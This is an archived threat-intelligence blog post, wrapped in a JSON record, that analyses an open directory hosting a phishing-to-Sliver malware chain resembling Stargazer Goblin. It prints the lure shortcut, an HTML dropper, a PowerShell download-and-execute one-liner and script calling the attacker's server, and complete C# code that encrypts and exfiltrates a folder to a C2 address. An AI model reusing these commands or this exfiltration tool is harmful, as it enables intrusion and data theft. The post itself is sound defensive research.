{ "id": "e618393e-42cb-4adc-84e7-8999b22a7094", "created_at": "2026-04-06T00:17:52.574575Z", "updated_at": "2026-04-10T03:33:20.83899Z", "deleted_at": null, "sha1_hash": "1cd2e5ea93d69a62297b497a2761cd64b32413ae", "title": "Echoes of Stargazer Goblin: Analyzing Shared TTPs from an Open Directory | Hunt.io", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 760721, "plain_text": "Echoes of Stargazer Goblin: Analyzing Shared TTPs from an Open\r\nDirectory | Hunt.io\r\nPublished: 2024-09-24 · Archived: 2026-04-05 16:36:01 UTC\r\nIntroduction\r\nSpecial thanks to Matthew from our team for his sharp eye in identifying this open directory, which set the stage for our\r\ninvestigation.\r\nOpen directories often offer a unique glimpse into how threat actors craft their campaigns and target networks, providing\r\ndefenders with critical insights into their evolving TTPs.\r\nRecently, we encountered files exposed on a server that revealed attack methods remarkably similar to those used by the\r\nthreat actor group Stargazer Goblin. Like the group first identified by CheckPoint Research, the files we'll discuss below\r\nused .hta and .bin files, and PowerShell to inject shellcode into legitimate processes to deliver malware.\r\nThis post will explore these overlaps in code and tactics, recognizing that while CheckPoint's reporting and the directory we\r\nfound share a striking resemblance, further evidence is needed before any definitive attribution can be made.\r\nA Chance Discovery: The Open Directory That Prompted Our Investigation\r\nSometimes, the most unexpected clues into a threat actor's operations come from the least likely places. Our team uncovered\r\nan open directory at 52.156.24[.]251:80 during a routine sweep of exposed assets across the Hunt platform. At first glance,\r\nthe directory appeared to be yet another forgotten repository on the outskirts of the web. However, several files named after\r\na published book on graphic design with extensions like .bin, .hta, and pdf.url caught our eye.\r\nFigure 1: Screenshot of the open directory in Hunt.\r\nUpon closer inspection, the directory's contents revealed patterns similar to those seen in recently reported threat activity.\r\nThe .hta and HTML files, packed with obfuscated VBScript designed to download additional files, closely mirror the\r\nhttps://hunt.io/blog/echoes-of-stargazer-goblin-analyzing-shared-ttps-from-an-open-directory\r\nPage 1 of 11\n\nmethods attributed to Stargazer Goblin.\r\nThis discovery pointed to the possibility of a deliberate malware distribution campaign by a sophisticated actor. Driven by\r\nthese findings, we decided to investigate further, uncovering additional parallels, which will be covered in the following\r\nsections.\r\nBrief Analysis of Files Found on the Server\r\nSeveral files in the directory are named after \"Logo Modernism,\" a book by Jens Müller and R. Roger Remington,\r\nsuggesting an attempt to blend in with legitimate content related to graphic design. Within the /lr folder, we discovered three\r\nrandomly named binary files: a benign executable named pdfreader.exe and a compressed file, Archive.zip.\r\nFigure 2: Contents of /lr folder.\r\nExtracting Archive.zip resulted in several PDFs of seemingly legitimate books on graphic design, aligning with the \"Logo\r\nModernism\" theme. Logo_Modernism.pdf.url--a deceptive shortcut disguised as a PDF was also included in the folder.\r\nAlthough the double extension file does not have an icon, we can hypothesize it serves as a lure to execute commands and\r\ngain initial access.\r\nFigure 3: Contents of Archive.zip including Logo_Modernism.pdf.url.\r\nhttps://hunt.io/blog/echoes-of-stargazer-goblin-analyzing-shared-ttps-from-an-open-directory\r\nPage 2 of 11\n\nAdditionally, the directory contained two other files, which raised red flags. The first, become.txt, contains PowerShell code\r\nwith variable naming conventions identical to those documented in the CheckPoint report, suggesting a possible connection\r\nor an attempt to emulate Stargazer Goblin.\r\nThe second file, code.ps1 consists of a highly obfuscated PowerShell script that, once decoded, reveals a data exfiltration\r\ntool that communicates with a private IP address. We can assess with a high degree of certainty that, when combined, these\r\nartifacts are likely part of a broader malicious operation.\r\nUnpacking the Attack Flow\r\nIn the last section, we identified the Logo_Modernism.pdf.url file as the likely method for initial access. We can assume the\r\nzip file is delivered through phishing or drive-by download.\r\nThis campaign leads to the open-source emulation framework, Sliver C2, which differs from the predominant stealer\r\nmalware identified in the above report.\r\nTo better understand how these files function within the broader attack, we mapped out the attack flow to show the steps to\r\ninfect networks. The diagram below shows how each component--beginning with the .url file disguised as PDF.\r\nFigure 4: Attack flow diagram.\r\nLogo_Modernism.pdf.url reaches out to the open directory to download \"Logo_Modernism.html.\" The URL uses unicode\r\nnon-breaking spaces (%E2%A0%80), likely for padding to hide the file extension.\r\n[{000214A0-0000-0000-C000-000000000046}]\r\nProp3=19,0\r\n[InternetShortcut]\r\nIDList=\r\nURL=mhtml:http://52.156.24.251:80Logo_Modernism%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%8\r\nHotKey=0\r\nIconIndex=13\r\nIconFile=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\r\nhttps://hunt.io/blog/echoes-of-stargazer-goblin-analyzing-shared-ttps-from-an-open-directory\r\nPage 3 of 11\n\nCopy\r\nLogo_Modernism.pdf.url\r\nThe downloaded HTML file opens a new browser window or tab and resizes the window to 1x1 pixels, making it almost\r\nimpossible to see. An HTTP GET request is then made to https://cbmelipilla[.]cl/te/hhhh.php. The domain, likely\r\ncompromised, is a legitimate site for a school in Chile. As of the time of writing, the PHP file was no longer available.\r\nIt's worth noting that CheckPoint also identified the use of PHP files on compromised WordPress sites to check the Referer\r\nheader and check if the IP address matched a deny list. Without examining the script, we can only assume this is a similar\r\nfunctionality the actor uses.\r\nAn HTA file hosted on the open directory is embedded in the webpage, which we'll describe next.\r\n\u003c!DOCTYPE html\u003e\r\n\u003chtml lang=\"en\"\u003e\r\n \u003chead\u003e\r\n \u003cscript\u003e\r\nwindow.open('', '_self', '');\r\nwindow.resizeTo(1, 1);\r\nvar xhr = new XMLHttpRequest();\r\nxhr.open('GET', 'https://cbmelipilla.cl/te/hhhh.php', true);\r\nxhr.onload = function() {\r\n};\r\nxhr.send();\r\nsetTimeout(function() {\r\nwindow.close();\r\n}, 5000000);\r\n\u003c/script\u003e\r\n\u003ciframe src=\"http://52.156.24.251:80/Logo_Modernism%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%\r\n \u003c/head\u003e\r\n \u003c/body\u003e\r\n\u003c/html\u003e\r\n \r\nCopy\r\nLogo_Modernism.html\r\nLogo_Modernism.hta (image below) defines an application named \"WelsonJS\" and makes the windows non-resizable and\r\nminimized. The file contains XOR-obfuscated VB script code that initializes three variables. Additionally, JavaScript is used\r\nto fetch an image, again related to graphic design from th.bing.com, likely as a decoy while the malicious code runs.\r\nhttps://hunt.io/blog/echoes-of-stargazer-goblin-analyzing-shared-ttps-from-an-open-directory\r\nPage 4 of 11\n\nUpdate (14 Nov 2024): WelsonJS is a legitimate open-source project on GitHub designed to help developers build Windows\napplications using the built-in JavaScript engine.\n\nxhr.send();\r\n\u003c/script\u003e\r\n \u003ctitle\u003eWelcome to WelsonJS application\u003c/title\u003e\r\nfdsfdsfasdf1232\r\n \r\nCopy\r\nLogo_Modernism.hta\r\nThe VBScript runs PowerShell commands that download and execute the code found within become.txt. The deobfuscated\r\ncode is below:\r\nage34 = \"powershell irm http://52.156.24.251:80/become.txt | iex\"\r\nmaster68 = \"winmgmts:\\\\\\\\.\\\\root\\\\cimv2\"\r\nancient26 = \"Win32_Process\"\r\n \r\nCopy\r\nDeobfuscated VB script code within .HTA file.\r\nbecome.txt consists of a PowerShell script designed to download the three .bin files and pdfreader.exe to the \\Temp directory\r\nand run the code. The activity is hidden by minimizing the console window.\r\nThe code in the text file, mainly the variable names, matches those used in a .NET injector described by CheckPoint.\r\n$crop213 = @'\r\n[DllImport(\"kernel32.dll\")]\r\npublic static extern IntPtr GetConsoleWindow();\r\n[DllImport(\"user32.dll\")]\r\npublic static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);\r\n'@\r\nAdd-Type -MemberDefinition $crop213 -Namespace \"crumble542543\" -Name \"culture6546\"\r\n$danger5646 = [crumble542543.culture6546]::GetConsoleWindow()\r\n[crumble542543.culture6546]::ShowWindow($danger5646, 0)\r\n$webClient = New-Object System.Net.WebClient\r\n$tempPath = [System.IO.Path]::GetTempPath()\r\n$webClient.DownloadFile(\"http://52.156.24.251:80/lr/12bre356yh.bin\", \"$tempPath\"+\"12bre356yh.bin\")\r\n$webClient.DownloadFile(\"http://52.156.24.251:80/lr/12bre35yh.bin\", \"$tempPath\"+\"12bre35yh.bin\")\r\n$webClient.DownloadFile(\"http://52.156.24.251:80/lr/12wefre356yh.bin\", \"$tempPath\"+\"12wefre356yh.bin\")\r\nhttps://hunt.io/blog/echoes-of-stargazer-goblin-analyzing-shared-ttps-from-an-open-directory\r\nPage 6 of 11\n\n$webClient.DownloadFile(\"http://52.156.24.251:80/lr/pdfreader.exe\", \"$tempPath\"+\"pdfreader.exe\")\r\nSet-Location -Path \"$tempPath\"\r\n$p=\"$tempPath\"+\"pdfreader.exe\"\r\n\u0026 $p\r\n \r\nCopy\r\nContents of become.txt\r\nThe three .bin files-12bre35yh.bin, 12bre356yh.bin, and 12wefre356yh.bin-contained shellcode generated by the donut\r\nproject, a tool commonly used to load shellcode into memory while evading detection. As the contents were heavily\r\nobfuscated, direct analysis provided limited insights. To obtain more detailed information, we utilized Volexity's open-source tool, donut_decryptor, to extract the payloads.\r\nA brief description of each file after decryption is below:\r\nmod_12bre35yh.bin: A PyInstaller executable, minimally detected in VirusTotal (2/73).\r\nmod_12bre356yh.bin: A Sliver C2 component configured to connect to 52.156.24.251:8888.\r\nmod_12wefre356yh.bin: A Win32 executable with a low detection rate (2 out of 70 on VirusTotal).\r\nWe also examined the contents of code.ps1, a PowerShell script encoded using a bitwise XOR operation. Each character in\r\nthe script was XORed with the hexadecimal value 0x4E (78 in decimal) to hide its malicious activity.\r\nBy applying a few lines of Python, we decoded the script, revealing the following:\r\necho 'using System;\r\nusing System.IO;\r\nusing System.IO.Compression;\r\nusing System.Net.Http;\r\nusing System.Security.Cryptography;\r\nusing System.Text;\r\nusing System.Threading;\r\nusing System.Threading.Tasks;\r\nclass Program\r\n{\r\nstatic async Task Main(string[] args)\r\n{\r\n string sourceFolderPath = @\"C:\\Users\\ra3ed\\OneDrive\\desktop\\sec-proj\\iphon14\";\r\n string compressedFilePath = @\"C:\\Users\\ra3ed\\OneDrive\\desktop\\sec-proj\\CompressedFile.zip\";\r\n string c2Url = \"http://10.162.221.3:63434\";\r\n const int delay = 5 * 60 * 1000;\r\n CompressFolder(sourceFolderPath, compressedFilePath);\r\n long fileSize = new FileInfo(compressedFilePath).Length;\r\n int chunkSize = (int)Math.Ceiling((double)fileSize / 5);\r\nhttps://hunt.io/blog/echoes-of-stargazer-goblin-analyzing-shared-ttps-from-an-open-directory\r\nPage 7 of 11\n\nawait TransferFileInParts(compressedFilePath, c2Url, chunkSize, delay);\r\n}\r\nstatic void CompressFolder(string folderPath, string zipPath)\r\n{\r\n if (File.Exists(zipPath))\r\n {\r\n File.Delete(zipPath);\r\n }\r\n ZipFile.CreateFromDirectory(folderPath, zipPath);\r\n}\r\nstatic async Task TransferFileInParts(string filePath, string url, int chunkSize, int delay)\r\n{\r\n using (FileStream fileStream = new FileStream(filePath, FileMode.Open, FileAccess.Read))\r\n {\r\n long fileSize = fileStream.Length;\r\n int numberOfChunks = (int)Math.Ceiling((double)fileSize / chunkSize);\r\n for (int i = 0; i \u003c numberOfChunks; i++)\r\n {\r\n byte[] buffer = new byte[chunkSize];\r\n int bytesRead = fileStream.Read(buffer, 0, chunkSize);\r\n byte[] encryptedChunk = EncryptData(buffer, bytesRead);\r\n await UploadChunkHttpAsync(encryptedChunk, encryptedChunk.Length, url, i + 1);\r\n if (i \u003c numberOfChunks - 1)\r\n {\r\n await Task.Delay(delay);\r\n }\r\n }\r\n }\r\n}\r\nstatic byte[] EncryptData(byte[] data, int length)\r\n{\r\n byte[] key = Encoding.ASCII.GetBytes(\"Blu3Ranger\");\r\n byte[] encrypted = new byte[length];\r\n for (int i = 0; i \u003c length; i++)\r\n {\r\n encrypted[i] = (byte)(data[i] ^ key[i % key.Length]);\r\n }\r\n return encrypted;\r\n}\r\nstatic async Task UploadChunkHttpAsync(byte[] buffer, int bytesRead, string url, int partNumber)\r\n{\r\n using (var client = new HttpClient())\r\n {\r\n var requestUri = $\"{url}?part={partNumber}\";\r\n using (var content = new ByteArrayContent(buffer, 0, bytesRead))\r\n {\r\nhttps://hunt.io/blog/echoes-of-stargazer-goblin-analyzing-shared-ttps-from-an-open-directory\r\nPage 8 of 11\n\ncontent.Headers.ContentType = new System.Net.Http.Headers.MediaTypeHeaderValue(\"application/octet-stream\");\r\n using (var request = new HttpRequestMessage(HttpMethod.Post, requestUri))\r\n {\r\n request.Headers.Add(\"User-Agent\", \"Mozilla/5.0\");\r\n request.Headers.Add(\"Accept\", \"application/json\");\r\n request.Content = content;\r\n HttpResponseMessage response = await client.SendAsync(request);\r\n response.EnsureSuccessStatusCode();\r\n Console.WriteLine(\"Upload complete: \" + response.RequestMessage.RequestUri);\r\n }\r\n }\r\n }\r\n}\r\n}'\u003e12344.cs;\r\n \r\nCopy\r\nContents of code.ps1\r\nThe decoded content contained C# code, a tool designed for data exfiltration. It encrypts chunks of data with the key\r\n\"Blu3Ranger\" and exfiltrates them to a private IP address using HTTP POST requests.\r\nNotably, on 13 September, the domain books.bluerangers[.]site began resolving to the same open directory server.\r\nDrawing Parallels: Echoes of Stargazer Goblin\r\nWhile our findings do not provide direct evidence of a link to the Stargazer Goblin group identified by CheckPoint\r\nResearch, there are several notable similarities and differences between the tactics used in both cases. Our analysis\r\nhighlights the following key points:\r\nSimilarities:\r\nTargeting Methodology: Our findings and the Stargazer Goblin report describe the use of phishing campaigns and\r\nmalicious downloads to compromise victims, indicating a similar approach to initial access techniques.\r\nFile Types and Delivery Mechanisms: The open directory mirrors Campaign 1 in the CheckPoint report, utilizing a\r\nsimilar combination of files: HTML, .HTA files, obfuscated VBScript, PowerShell scripts, .NET code, and .bin files\r\ncontaining shellcode for malware delivery.\r\nVariable Naming in Malicious Scripts: The malicious VBScript in both cases uses similarly structured variable\r\nnames (e.g., tired52 in the CheckPoint report versus age34 in the open directory), suggesting a possible effort to\r\nemulate or reuse known malicious coding patterns.\r\nDifferences:\r\nFile Handling and Execution: The file useless.txt from the Stargazers campaign adopts a stealthier technique by\r\ndownloading a single file and executing it directly in memory, minimizing detection risks.\r\nhttps://hunt.io/blog/echoes-of-stargazer-goblin-analyzing-shared-ttps-from-an-open-directory\r\nPage 9 of 11\n\nIn contrast, become.txt from the open directory takes a more rudimentary approach by downloading three binary files\r\ndirectly to disk-an action more likely to trigger alerts from standard security controls.\r\nLevel of Sophistication: Using less sophisticated tactics, such as dropping files to disk, combined with the data in\r\ncode.ps1, suggests a potentially different threat actor profile. These differences, including folder paths in the\r\nPowerShell script referring to a sub-folder named \"sec-proj\" (possibly short for \"security project\"), lead us to\r\nconsider the possibility that this could be a Red Team or another actor attempting to emulate the tactics of Stargazer\r\nGoblin.\r\nFinal Thoughts\r\nIn summary, while there are clear overlaps in tactics and techniques with those seen in the Stargazer Goblin campaigns,\r\nspecific indicators-such as the absence of GitHub-based distribution or the use of less sophisticated file handling-make a\r\ndirect attribution to Stargazer Goblin uncertain.\r\nThese similarities might reflect coincidence or an attempt by another actor to imitate known methods. Without additional\r\nevidence, any definitive connection remains speculative, highlighting the need for continued monitoring and analysis.\r\nNetwork Observables\r\nIP Address ASN Ports Open Domain(s) Notes\r\n52.156.24[.]251:80\r\nMicrosoft\r\nCorporation\r\n22, 80, 443,\r\n31337, 8888\r\nbooks.bluerangers[.]site\r\nOpen directory containing\r\nmalicious files. Port 8888 served\r\nas the C2 for Sliver.\r\nHost Observables\r\nFile Name SHA-256 Hash Notes\r\nLogo_Modernism.hta 5a782ed1af8a937f691391479e38fef11b9e3e48c7efec832f2e42e801ec5756\r\nContains obfuscated\r\nVB script, which\r\ndownloads become.t\r\nLogo_Modernism.html a738e4deae350b369aef566558c430fa3a8ac52dbdcb1f27a676fde9f7db9cbe\r\nDecoy HTML page\r\nwith an iframe that\r\ndownloads\r\nLogo_Modernism.ht\r\nLogo_Modernism.pdf.url cdfb1afbd30b1eb484cc0e13caf2dd791429d8e9fbaedee77dce2a5a8e31e540\r\nShortcut file which\r\ndownloads\r\nLogo_Modernism.ht\r\nbecome.txt 588abfb199a1f9a199c8cfe072b551f844289fd26d043b510915a4da8ed781f7\r\nPowerShell code to\r\ndownload .bin files\r\nand pdfreader.exe\r\ncode.ps1 e64112efcfe916abad6d4c86b4cc14973e6f9b30694781190ca21d05b687029f\r\nData exfiltration too\r\ncommunicating with\r\nprivate IP address on\r\nport 63434\r\n/lr/12bre356yh.bin 44daec80b70c40d8a03b15d89ab8f85590551606063bc3b12a74498ac065cb44 PyInstaller EXE\r\nhttps://hunt.io/blog/echoes-of-stargazer-goblin-analyzing-shared-ttps-from-an-open-directory\r\nPage 10 of 11\n\nFile Name SHA-256 Hash Notes\r\n/lr/12bre356h.bin 808ff1ef0360c8c58a523eccf8a6107b9905393fea2384f58e05ee3cee15ded4 Sliver malware\r\n/lr/12wefre356yh.bin d63d4a50460b6797eb177dc9728ba6454853250d0ee3b0e50d7d9e32882bcf4b Win32 EXE\r\n/lr/Archive.zip bfe8d4bf3ccf26321b9af67fe7baa33d27a88e03aeee7369b00ed3724c8a451b\r\nZip file containing\r\nbenign PDFs and\r\nmalicious pdf.url file\r\nSource: https://hunt.io/blog/echoes-of-stargazer-goblin-analyzing-shared-ttps-from-an-open-directory\r\nhttps://hunt.io/blog/echoes-of-stargazer-goblin-analyzing-shared-ttps-from-an-open-directory\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://hunt.io/blog/echoes-of-stargazer-goblin-analyzing-shared-ttps-from-an-open-directory" ], "report_names": [ "echoes-of-stargazer-goblin-analyzing-shared-ttps-from-an-open-directory" ], "threat_actors": [ { "id": "e8dd54ac-a3fa-4496-8b17-a9360ad13927", "created_at": "2024-07-28T02:00:04.686094Z", "updated_at": "2026-04-10T02:00:03.680897Z", "deleted_at": null, "main_name": "Stargazer Goblin", "aliases": [], "source_name": "MISPGALAXY:Stargazer Goblin", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434672, "ts_updated_at": 1775792000, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/1cd2e5ea93d69a62297b497a2761cd64b32413ae.pdf", "text": "https://archive.orkl.eu/1cd2e5ea93d69a62297b497a2761cd64b32413ae.txt", "img": "https://archive.orkl.eu/1cd2e5ea93d69a62297b497a2761cd64b32413ae.jpg" } }